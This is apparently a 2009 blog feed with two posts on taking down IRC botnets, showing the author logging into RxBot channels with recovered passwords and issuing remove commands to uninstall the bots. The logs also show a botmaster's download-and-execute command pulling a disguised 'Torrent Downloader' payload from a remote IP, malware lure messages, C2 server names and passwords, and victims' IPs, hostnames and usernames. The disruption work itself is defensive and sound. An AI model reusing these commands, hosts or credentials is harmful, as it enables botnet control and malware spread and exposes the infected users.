    [2009-05-26 22:30] <n-574783> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 18.4 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 16.3 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 17.6 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-473636> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 17.6 KB/sec.
    [2009-05-26 22:30] <n-069330> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 17.6 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 21.0 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] *** Joins: n-383723
    [2009-05-26 22:30] <n-574783> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-798534> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-571058> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 13.4 KB/sec.
    [2009-05-26 22:30] <n-571058> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-520755> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-709284> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 12.6 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-583027> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 11.6 KB/sec.
    [2009-05-26 22:30] <n-583027> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-833356> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 22.0 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-564682> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 10.3 KB/sec.
    [2009-05-26 22:30] <n-564682> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] <n-359209> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 11.0 KB/sec.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 10.0 KB/sec.
    [2009-05-26 22:30] <n-359209> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] *** Parts: n-684753
    [2009-05-26 22:30] <n-497894> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 9.2 KB/sec.
    [2009-05-26 22:30] *** Parts: n-151753
    [2009-05-26 22:30] <n-497894> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] *** Parts: n-506956
    [2009-05-26 22:30] <n-887717> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 16.3 KB/sec.
    [2009-05-26 22:30] <n-887717> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:30] *** Parts: Snake
    [2009-05-26 22:31] <n-125554> [MAIN]: Password accepted.
    [2009-05-26 22:31] <n-418650> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 7.6 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.
    - [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 6.6 KB/sec.
    [2009-05-26 22:31] <n-397296> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:31] <n-896928> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 6.0 KB/sec.
    [2009-05-26 22:31] <n-896928> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:31] <n-621628> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 5.5 KB/sec.
    [2009-05-26 22:31] *** Joins: Snake
    [2009-05-26 22:31] <n-621628> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:31] <n-099717> [DOWNLOAD]: Downloaded 440.8 KB to c:\windows\mds.exe @ 4.6 KB/sec.
    [2009-05-26 22:31] <n-099717> [DOWNLOAD]: Opened: c:\windows\mds.exe.
    [2009-05-26 22:31] <n-125554> [DOWNLOAD]: Downloading URL: http://81.196.95.22:528/nr.exe to: c:\windows\mds.exe.
    [2009-05-26 22:31] *** Joins: n-764941
    [2009-05-26 22:31] *** Parts: Snake
    [2009-05-26 22:31] *** Parts: n-125554
    [2009-05-26 22:32] *** Joins: Snake
    [2009-05-26 22:32] *** Parts: Snake
    [2009-05-26 22:33] <n-577176> [DOWNLOAD]: Downloaded 439.0 KB to c:\windows\mds.exe @ 2.1 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\mds.exe.

    So the login password is thepartofmindhack, same as server password and channel password. A quick look at RxBot commands shows,

    Code:
    remove   rm       .remove  Removes the bot completely.         <@RXBOT> .remove
                                                                    <rBot-32315> [MAIN]: Removing Bot.


    Let's see...

    Quote:
    [2009-05-26 22:34] <Lithium> .login thepartofmindhack
    [2009-05-26 22:34] <n-234644> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 22:34] <n-598900> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 22:34] <n-704388> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 22:34] <n-069330> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 22:34] <Lithium> .remove
    [2009-05-26 22:34] <n-497181> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 22:34] <n-007036> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 22:34] <n-574783> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 22:34] <n-577176> [MAIN]: Password accepted.
    [2009-05-26 22:34] *** Joins: n-978312
    [2009-05-26 22:34] *** Parts: n-325084
    [2009-05-26 22:34] <n-234644> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-186739> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] *** Parts: n-234644
    [2009-05-26 22:34] *** Parts: n-186739
    [2009-05-26 22:34] *** Parts: n-599247
    [2009-05-26 22:34] <n-927673> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-634355> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-598900> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-453828> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-069330> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-209874> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-105384> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-232275> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-644986> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-038736> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-502610> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-833356> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-749060> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-623429> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-906008> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-138896> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-803614> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-007036> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-451594> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-948576> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-914449> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-206544> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-122510> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-163349> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-608854> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-656401> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-416676> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-568861> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-418650> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-611304> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-435013> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-139850> [MAIN]: Removing Bot.
    [2009-05-26 22:34] *** Parts: n-927673
    [2009-05-26 22:34] *** Parts: n-453107
    [2009-05-26 22:34] *** Parts: n-634355
    [2009-05-26 22:34] *** Parts: n-209372
    [2009-05-26 22:34] *** Parts: n-598900
    [2009-05-26 22:34] *** Parts: n-453828
    [2009-05-26 22:34] *** Parts: n-969379
    [2009-05-26 22:34] *** Parts: n-069330
    [2009-05-26 22:34] *** Parts: n-933488
    [2009-05-26 22:34] *** Parts: n-704388
    [2009-05-26 22:34] *** Parts: n-724312
    [2009-05-26 22:34] *** Parts: n-626412
    [2009-05-26 22:34] *** Parts: n-729889
    [2009-05-26 22:34] *** Parts: n-454604
    [2009-05-26 22:34] *** Parts: n-209874
    [2009-05-26 22:34] *** Parts: n-085369
    [2009-05-26 22:34] *** Parts: n-642718
    [2009-05-26 22:34] *** Parts: n-105384
    [2009-05-26 22:34] *** Parts: n-562456
    [2009-05-26 22:34] *** Parts: n-232275
    [2009-05-26 22:34] *** Parts: n-298615
    [2009-05-26 22:34] *** Parts: n-663781
    [2009-05-26 22:34] *** Parts: n-625681
    [2009-05-26 22:34] *** Parts: n-036448
    [2009-05-26 22:34] *** Parts: n-060080
    [2009-05-26 22:34] *** Parts: n-520755
    [2009-05-26 22:34] *** Parts: n-644986
    [2009-05-26 22:34] *** Parts: n-003745
    [2009-05-26 22:34] *** Parts: n-038736
    [2009-05-26 22:34] *** Parts: n-838578
    [2009-05-26 22:34] *** Parts: n-798534
    [2009-05-26 22:34] *** Parts: n-502610
    [2009-05-26 22:34] *** Parts: n-734028
    [2009-05-26 22:34] *** Parts: n-833356
    [2009-05-26 22:34] *** Parts: n-749060
    [2009-05-26 22:34] *** Parts: n-073959
    [2009-05-26 22:34] *** Parts: n-125949
    [2009-05-26 22:34] *** Parts: n-090483
    [2009-05-26 22:34] *** Parts: n-531390
    [2009-05-26 22:34] *** Parts: n-473636
    [2009-05-26 22:34] *** Parts: n-482175
    [2009-05-26 22:34] *** Parts: n-623429
    [2009-05-26 22:34] *** Parts: n-036476
    [2009-05-26 22:34] *** Parts: n-906008
    [2009-05-26 22:34] *** Parts: n-138896
    [2009-05-26 22:34] *** Parts: n-813976
    [2009-05-26 22:34] *** Parts: n-497181
    [2009-05-26 22:34] *** Parts: n-359859
    [2009-05-26 22:34] *** Parts: n-803614
    [2009-05-26 22:34] *** Parts: n-007036
    [2009-05-26 22:34] *** Parts: n-451594
    [2009-05-26 22:34] *** Parts: n-673312
    [2009-05-26 22:34] *** Parts: n-948576
    [2009-05-26 22:34] *** Parts: n-914449
    [2009-05-26 22:34] *** Parts: n-206544
    [2009-05-26 22:34] *** Parts: n-122510
    [2009-05-26 22:34] *** Parts: n-339428
    [2009-05-26 22:34] *** Parts: n-163349
    [2009-05-26 22:34] *** Parts: n-763665
    [2009-05-26 22:34] *** Parts: n-708766
    [2009-05-26 22:34] *** Parts: n-105601
    [2009-05-26 22:34] *** Parts: n-608854
    [2009-05-26 22:34] *** Parts: n-416676
    [2009-05-26 22:34] *** Parts: n-656401
    [2009-05-26 22:34] *** Parts: n-764941
    [2009-05-26 22:34] *** Parts: n-568861
    [2009-05-26 22:34] *** Parts: n-418650
    [2009-05-26 22:34] *** Parts: n-611304
    [2009-05-26 22:34] *** Parts: n-435013
    [2009-05-26 22:34] *** Parts: n-573696
    [2009-05-26 22:34] *** Parts: n-139850
    [2009-05-26 22:34] *** Parts: n-121286
    [2009-05-26 22:34] *** Parts: n-359209
    [2009-05-26 22:34] *** Parts: n-536251
    [2009-05-26 22:34] *** Parts: n-915282
    [2009-05-26 22:34] *** Parts: n-577176
    [2009-05-26 22:34] *** Parts: n-658591
    [2009-05-26 22:34] *** Parts: n-718491
    [2009-05-26 22:34] *** Parts: n-851344
    [2009-05-26 22:34] *** Parts: n-383723
    [2009-05-26 22:34] *** Parts: n-797870
    [2009-05-26 22:34] *** Parts: n-583027
    [2009-05-26 22:34] <n-121286> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-359209> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-536251> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-915282> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-577176> [MAIN]: Removing Bot.
    - [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-718491> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-851344> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-797870> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-343371> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-574783> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-081379> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-571058> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-397296> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-497894> [MAIN]: Removing Bot.
    [2009-05-26 22:34] <n-709284> [MAIN]: Removing Bot.
    [2009-05-26 22:34] *** Parts: n-887717
    [2009-05-26 22:34] *** Parts: n-343371
    [2009-05-26 22:34] *** Parts: n-574783
    [2009-05-26 22:34] *** Parts: n-081379
    [2009-05-26 22:34] *** Parts: n-571058
    [2009-05-26 22:34] *** Parts: n-397296
    [2009-05-26 22:34] *** Parts: n-497894
    [2009-05-26 22:34] *** Parts: n-709284
    [2009-05-26 22:34] *** Parts: n-621628
    [2009-05-26 22:34] <n-564682> [MAIN]: Removing Bot.
    [2009-05-26 22:34] *** Parts: n-564682
    [2009-05-26 22:35] *** Disconnected


    The end.
    ]]>
    http://nemesis.te-home.net/Forum/3000_News/20090526_How_to_destroy_an_IRC_botnet.html Tue, 26 May 2009 22:05:53 GMT 1336185092
    <![CDATA[How to shutdown a IRC botnet #2]]> http://nemesis.te-home.net/Forum/3000_News/20090527_How_to_shutdown_a_IRC_botnet__2.html
    š°o-OpChat-o°š wrote:
    [20:51:11] <š°o-OpChat-o°š> *** PM Flood detected: Vrei sa downloadezi fara limita pe torrent? si dupa DC++? atuncia nu ai nimic mai usor de facut decat sa downloadezi acest program : http://79.112.133.113:81/Torrent%20Downloader.rar Sper sa fii multumit de el --- cZUli -- IP=' 79.112.133.113 ' Host='  ' User=' [RO]FwmAK '  


    [RO]Tracker-Czone wrote:
    [01:23:34] <[RO]Tracker-Czone> Vrei sa downloadezi fara limita pe torrent? si dupa DC++? atuncia nu ai nimic mai usor de facut decat sa downloadezi acest program : http://79.112.131.143:81/Torrent%20Downloader.rar Sper sa fii multumit de el --- uUuFz


    Quote:
    MåX_Måƒîº†” 79.112.133.113, conectat: 2009-05-25 16:37:33 for 16 minutes 14 seconds
    MåX_Måƒîº†” 79.112.133.113, conectat: 2009-05-25 17:46:54 for 29 seconds
    MåX_Måƒîº†” 79.112.133.113, conectat: 2009-05-25 17:49:08 for 3 hours 59 minutes 43 seconds
    MåX_Måƒîº†” 79.112.131.143, conectat: 2009-05-26 20:20:46 for 1 minutes 12 seconds
    MåX_Måƒîº†” 79.112.131.143, conectat: 2009-05-26 20:29:59 for 50 minutes 59 seconds


    • Server address: dns-ronetwork.serveirc.com
    • Server password: maxhack98
    • Channel: #ronetwork
    • Channel password: maxhack98
    • Nickname prefix for bots: [-MaX-]-*


    Quote:
    [2009-05-26 18:41] *** Connected
    [2009-05-26 18:41] *** Looking up your hostname
    [2009-05-26 18:41] *** Checking Ident
    [2009-05-26 18:41] *** Couldn't look up your hostname
    [2009-05-26 18:41] *** No ident response
    [2009-05-26 18:41] <my.server.name> Welcome to the Internet Relay Network [-MaX-]-769563
    Your host is my.server.name, running version beware1.5.7
    This server was created Tue Jul 13 2004 at 20:36:07 GMT
    my.server.name beware1.5.7 dgikoswx biklmnoprstv
    MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported by this server
    NICKLEN=20 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 :are supported by this server
    There are 13 users and 0 invisible on 1 servers
    1 :channels formed
    I have 13 clients and 0 servers
    [2009-05-26 18:41] *** [-MaX-]-769563 Highest connection count: 13 (13 clients)
    [2009-05-26 18:41] <my.server.name> MOTD File is missing
    [2009-05-26 18:41] *** [-MaX-]-769563 on 1 ca 1(4) ft 10(10)
    [2009-05-26 18:41] <my.server.name> Unknown MODE flag
    [2009-05-26 18:44] <MaX> .login maxhack98
    [2009-05-26 18:44] <[-MaX-]-686812> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 18:44] <[-MaX-]-359565> [MAIN]: Password accepted.
    - [MAIN]: Password accepted.
    [2009-05-26 18:44] <[-MaX-]-554431> [MAIN]: Password accepted.
    [2009-05-26 18:50] <MaX> .sysinfo
    [2009-05-26 18:50] <[-MaX-]-686812> [SYSINFO]: [CPU]: 2500MHz. [RAM]: 2,095,532KB total, 2,095,532KB free. [Disk]: 20,482,840KB total, 6,056,704KB free. [OS]: Windows XP (Service Pack 2) (5.1, Build 2600). [Sysdir]: C:\WINDOWS\system32. [Hostname]: georgian-28651d (86.121.247.184). [Current User]: ?. [Date]: 26:May:2009. [Time]: 18:42:28. [Uptime]: 0d 12h 33m.
    [2009-05-26 18:50] <[-MaX-]-455515> [SYSINFO]: [CPU]: 1775MHz. [RAM]: 2,097,151KB total, 2,097,151KB free. [Disk]: 20,482,840KB total, 8,081,376KB free. [OS]: Windows XP (Service Pack 2) (5.1, Build 2600). [Sysdir]: C:\WINDOWS\system32. [Hostname]: my-5b2d1e43d215 (89.115.160.203). [Current User]: Sorin. [Date]: 26:May:2009. [Time]: 18:42:32. [Uptime]: 0d 0h 14m.
    - [SYSINFO]: [CPU]: 2000MHz. [RAM]: 981,360KB total, 981,360KB free. [Disk]: 51,199,120KB total, 9,866,476KB free. [OS]: Windows XP (Service Pack 2) (5.1, Build 2600). [Sysdir]: C:\WINDOWS\system32. [Hostname]: LastXP16 (85.122.69.166). [Current User]: Administrator. [Date]: 26:May:2009. [Time]: 18:43:00. [Uptime]: 0d 0h 38m.
    - [SYSINFO]: [CPU]: 2133MHz. [RAM]: 2,097,151KB total, 2,097,151KB free. [Disk]: 71,681,996KB total, 2,349,644KB free. [OS]: Windows XP (Service Pack 2) (5.1, Build 2600). [Sysdir]: C:\WINDOWS\system32. [Hostname]: home-cdbaa9f7a6.lan (192.168.1.64). [Current User]: ww. [Date]: 26:May:2009. [Time]: 18:42:31. [Uptime]: 0d 1h 39m.
    - [SYSINFO]: [CPU]: 2533MHz. [RAM]: 2,086,316KB total, 2,086,316KB free. [Disk]: 38,909,396KB total, 23,486,636KB free. [OS]: Windows XP (Service Pack 2) (5.1, Build 2600). [Sysdir]: C:\WINDOWS\system32. [Hostname]: ionut-9d2b5306a (89.42.232.182). [Current User]: ?. [Date]: 26:May:2009. [Time]: 06:42:04. [Uptime]: 0d 3h 3m.
    - [SYSINFO]: [CPU]: 3075MHz. [RAM]: 457,200KB total, 457,200KB free. [Disk]: 25,599,544KB total, 17,608,208KB free. [OS]: Windows XP (Service Pack 2) (5.1, Build 2600). [Sysdir]: C:\WINDOWS\system32. [Hostname]: viola (79.114.50.40). [Current User]: raduviola. [Date]: 26:May:2009. [Time]: 18:42:46. [Uptime]: 0d 2h 59m.
    [2009-05-26 18:50] <[-MaX-]-554431> [SYSINFO]: [CPU]: 2200MHz. [RAM]: 2,096,624KB total, 2,096,624KB free. [Disk]: 78,140,128KB total, 51,041,548KB free. [OS]: Windows XP (Service Pack 3) (5.1, Build 2600). [Sysdir]: C:\WINDOWS\system32. [Hostname]: corp-1.lan (89.123.62.28). [Current User]: mihai. [Date]: 26:May:2009. [Time]: 18:40:18. [Uptime]: 0d 0h 28m.
    - [SYSINFO]: [CPU]: 2500MHz. [RAM]: 2,095,572KB total, 2,095,572KB free. [Disk]: 51,199,996KB total, 14,920,064KB free. [OS]: Windows ??? (Service Pack 1) (6.0, Build 6001). [Sysdir]: C:\Windows\system32. [Hostname]: dan-PC (86.121.82.182). [Current User]: dan. [Date]: 26:May:2002. [Time]: 06:39:46. [Uptime]: 0d 1h 10m.
    - [SYSINFO]: [CPU]: 800MHz. [RAM]: 456,680KB total, 456,680KB free. [Disk]: 40,957,684KB total, 2,878,560KB free. [OS]: Windows XP (Service Pack 2) (5.1, Build 2600). [Sysdir]: C:\WINDOWS\system32. [Hostname]: sketis-11229343 (79.117.118.145). [Current User]: Constantin. [Date]: 26:May:2009. [Time]: 18:42:36. [Uptime]: 0d 0h 38m.
    [2009-05-26 18:50] <[-MaX-]-070294> [SYSINFO]: [CPU]: 925MHz. [RAM]: 260,528KB total, 260,528KB free. [Disk]: 20,971,408KB total, 7,383,960KB free. [OS]: Windows XP (Service Pack 2) (5.1, Build 2600). [Sysdir]: C:\WINDOWS\system32. [Hostname]: home-f8c6047fda (86.123.192.158). [Current User]: Marius. [Date]: 26:May:2009. [Time]: 18:42:35. [Uptime]: 0d 2h 11m.
    [2009-05-26 18:50] <[-MaX-]-633840> [SYSINFO]: [CPU]: 1400MHz. [RAM]: 1,047,856KB total, 1,047,856KB free. [Disk]: 20,482,840KB total, 13,869,176KB free. [OS]: Windows XP (Service Pack 2) (5.1, Build 2600). [Sysdir]: C:\WINDOWS\system32. [Hostname]: home-982267ae29 (95.76.194.144). [Current User]: ADRIAN. [Date]: 26:May:2009. [Time]: 18:33:36. [Uptime]: 0d 1h 59m.
    [2009-05-26 18:50] <[-MaX-]-359565> [SYSINFO]: [CPU]: 3025MHz. [RAM]: 523,756KB total, 523,756KB free. [Disk]: 41,985,844KB total, 24,527,712KB free. [OS]: Windows XP (Service Pack 3) (5.1, Build 2600). [Sysdir]: C:\WINDOWS\system32. [Hostname]: xxx-e5d0b6adb9d (172.16.21.15). [Current User]: user. [Date]: 26:May:2009. [Time]: 18:42:21. [Uptime]: 0d 1h 51m.
    [2009-05-26 18:54] <MaX> .download http://79.112.132.25:81/Torrent%20Downloader.exe c:\windows\system32\winsmgs.exe 1
    [2009-05-26 18:54] <[-MaX-]-686812> [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/Torrent%20Downloader.exe to: c:\windows\system32\winsmgs.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/Torrent%20Downloader.exe to: c:\windows\system32\winsmgs.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/Torrent%20Downloader.exe to: c:\windows\system32\winsmgs.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/Torrent%20Downloader.exe to: c:\windows\system32\winsmgs.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/Torrent%20Downloader.exe to: c:\windows\system32\winsmgs.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/Torrent%20Downloader.exe to: c:\windows\system32\winsmgs.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/Torrent%20Downloader.exe to: c:\windows\system32\winsmgs.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/Torrent%20Downloader.exe to: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-070294> [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/Torrent%20Downloader.exe to: c:\windows\system32\winsmgs.exe.
    - [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/Torrent%20Downloader.exe to: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-686812> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\system32\winsmgs.exe @ 347.3 KB/sec.
    [2009-05-26 18:54] <[-MaX-]-686812> [DOWNLOAD]: Opened: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-633840> [DOWNLOAD]: Downloading URL: http://79.112.132.25:81/Torrent%20Downloader.exe to: c:\windows\system32\winsmgs.exe.
    - [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\system32\winsmgs.exe @ 173.7 KB/sec.
    - [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\system32\winsmgs.exe @ 173.7 KB/sec.
    - [DOWNLOAD]: Opened: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-070294> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\system32\winsmgs.exe @ 347.3 KB/sec.
    [2009-05-26 18:54] <[-MaX-]-070294> [DOWNLOAD]: Opened: c:\windows\system32\winsmgs.exe.
    [2009-05-26 18:54] <[-MaX-]-967700> [DOWNLOAD]: Downloaded 347.3 KB to c:\windows\system32\winsmgs.exe @ 173.7 KB/sec.
